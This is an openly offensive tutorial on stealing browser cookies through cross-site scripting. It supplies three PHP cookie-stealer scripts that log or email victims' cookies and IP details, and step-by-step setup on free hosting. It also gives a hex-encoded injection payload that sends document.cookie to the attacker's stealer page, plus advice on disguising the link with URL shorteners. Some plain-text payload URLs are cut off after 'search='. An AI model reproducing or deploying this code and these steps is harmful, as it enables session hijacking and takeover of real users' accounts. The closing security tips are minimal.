Hack cookie XSS Method


Requirements:
  • A cookie Stealer code : Here is the simple Cookie Stealer code: Cookie stored in File:
  • $cookie = $HTTP_GET_VARS["cookie"];
    $steal = fopen("cookiefile.txt", "a");
    fwrite($steal, $cookie ."\\n");
    fclose($steal);
    ?>
    $cookie = $HTTP_GET_VARS["cookie"]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.

    $steal = fopen("cookiefile.txt", "a"); This open the cookiefile in append mode so that we can append the stolen cookie.

    fwrite($steal, $cookie ."\\n"); This will store the stolen cookie inside the file.

    fclose($steal); close the opened file.

    Another version: Sends cookies to the hacker mail  
    $cookie = $HTTP_GET_VARS["cookie"]; mail("hackerid@mailprovider.com", "Stolen Cookies", $cookie);
    ?>
    The above code will mail the cookies to hacker mail using the PHP() mail function with subject "Stolen cookies".

    Third Version
    function GetIP()
    {
        if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
            $ip = getenv("HTTP_CLIENT_IP");
        else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
            $ip = getenv("HTTP_X_FORWARDED_FOR");
        else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
            $ip = getenv("REMOTE_ADDR");
        else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
            $ip = $_SERVER['REMOTE_ADDR'];
        else
            $ip = "unknown";
        return($ip);
    }
    function logData()
    {
        $ipLog="log.txt";
        $cookie = $_SERVER['QUERY_STRING'];
        $register_globals = (bool) ini_get('register_gobals');
        if ($register_globals) $ip = getenv('REMOTE_ADDR');
        else $ip = GetIP();

        $rem_port = $_SERVER['REMOTE_PORT'];
        $user_agent = $_SERVER['HTTP_USER_AGENT'];
        $rqst_method = $_SERVER['METHOD'];
        $rem_host = $_SERVER['REMOTE_HOST'];
        $referer = $_SERVER['HTTP_REFERER'];
        $date=date ("l dS of F Y h:i:s A");
        $log=fopen("$ipLog", "a+");

        if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
            fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie
    ");
        else
            fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
        fclose($log);
    }
    logData();
    ?>
     The above Cookie stealer will store the following information:
    • Ip address
    • port number
    • host(usually computer-name)
    • user agent
    • cookie
  • Free Web hosting service
  • Basic Knowledge about XSS
  • Basic Knowledge about Computer Cookies
Cookie stealing is the process of exploiting the XSS vulnerability (Non-persistent/persistent) and steal the cookie from the victim who visit the infected link. These cookie will be used to compromise their accounts.

    Step 1: Creating Cookie Stealer PHP file
    Get the Cookie stealer from the link i mentioned.  In that post, i have explained three versions of cookie stealer.  We are going to use the third version.
    • Copy the code.
    • Open Notepad and paste the code
    • Save the file with .php extension
      Eg: Stealer.php
    Now create New file and save it as log.txt (leave it as blank). Don't change the name , this is the file name what we give in php file.

    Now you will have two files;
    1. Stealer.php
    2. log.txt

    What these two files do exactly?
    The above Stealer.php file get ip address,cookie and stores the data in log.txt file.
    The log.txt has cookies , ip address details.

    Step 2:  
    Register in a free web-hosting service and login into your cpanel.
    Now open the File Manager in cpanel.
    Upload the Stealer.php and log.txt to root folder or public_html folder.

    Now the stealer will be at hxxp://www.YourSite.com/Stealer.php .

    Step 3: Exploiting the XSS Vulnerability
    So Far , we have sharpened our saw.  Now we are going to use it.
    Once you set up everything and find a Vulnerable site,then inject the following code in the Vulnerable sites.

    For example:
    hxxp://www.VulnerableSite.com/index.php?search=

    Cookie Stealing with Non-Persistent vs Persistent XSS:
    Persistent: if you inject this code in Persistent XSS vulnerable site, it will be there forever until admin find it.  It will be shown to all users.  So attackers don't need to send any link to others.  Whoever visit the page, they will be vicim.

    Non-Persistent:
    In case of Non-persistent attack, attacker will send the link to victims. Whenever they follow the link, it will steal the cookie.  Most of sites are vulnerable to Non-persistent XSS .

    In Non-persistence, Attackers will send the injected link victims.
    For example:
    hxxp://www.VulnerableSite.com/index.php?search=

    The above link is clearly shows the scripts.  Hackers can Hex-encode this script  so that victim can't see the script.
    For Example:
    hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e
    Still , the link look long. The attacker use one more trick to hide the long url i.e url shortening sites. There are lot of sites that shorten the long url into tiny url.

    For example:
    hxxp://www.tinyexample.com/twrwd63

    Once the victim follow the link, his cookie will be stored in log.txt file.

    How to be Secure from this attack?
    • Use No-Script Addon. This is best protection to stay away from XSS 
    • Never Click the Shorten url
    • Sometime you may want to follow the shorten link.  If so, then clear all cookies in your browser and visit through Proxy or VPN(it will hide your ip)
    • (Later We will cover security tips for site admin , so stay tuned)